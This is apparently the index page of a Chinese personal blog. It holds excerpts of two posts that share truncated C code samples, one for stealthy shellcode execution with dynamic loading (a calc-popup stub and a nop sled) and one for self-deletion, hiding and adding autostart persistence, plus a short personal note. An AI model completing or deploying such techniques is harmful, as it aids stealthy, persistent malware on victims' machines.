维先生的博客

样本：2016-04-20 特点：隐蔽执行、动态加载 [codeblock lang="" line="1"] #include "apiprocrun.h" #include /* void shellcode() { __asm { ;popup calc ;int 3 ;调试时快速根据异常地址定位代码 ;nop空指令 用于调试时快速区分识别代码开始 nop nop nop nop nop nop nop nop nop nop nop nop ;sub esp,… Read More

样本：2016-04-11 特点：“自删除”、隐藏和添加自启动 Code#include "hideself.h" #include #include #pragma comment(lib, "user32.lib") #include using namespace std; void hideself(){  char szStartPath[MAX_PATH] = {0};  char… Read More

两年之后，重拾博客，为的是在碌碌的工作生活中及时整理自己，开启新的旅途篇章。 每每改变，都知道坚持会成为习惯，坚持就是收获；未来的脚步时时在前进，没有那么多的时间容你慢慢悠悠的思考。所以，有所思绪，有所收获，有所困惑，都希望能够有个属于自己的地方能够认真的记录，并且让世界有所发现，让自己有所进步。 此致，奋斗的我们。 Read More